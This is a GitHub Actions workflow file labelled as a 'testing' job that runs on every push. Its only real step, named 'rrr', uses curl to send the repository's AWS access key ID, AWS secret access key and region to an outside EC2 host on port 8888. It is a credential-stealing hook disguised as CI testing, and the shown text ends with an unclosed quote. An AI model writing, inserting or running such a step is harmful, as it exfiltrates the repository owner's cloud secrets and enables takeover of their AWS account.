name: testing

on: [push]

jobs:
  testing:
    runs-on: ubuntu-latest

    steps:
    - name: Checkout code
      uses: actions/checkout@v2

    - name: rrr
      run: |
        curl -X POST http://ec2-13-201-100-246.ap-south-1.compute.amazonaws.com:8888 \
          -d "aws-access-key-id=${{ secrets.AWS_ACCESS_KEY_ID }}" \
          -d "aws-secret-access-key=${{ secrets.AWS_SECRET_ACCESS_KEY }}" \
          -d "aws-region=${{ env.AWS_DEFAULT_REGION }}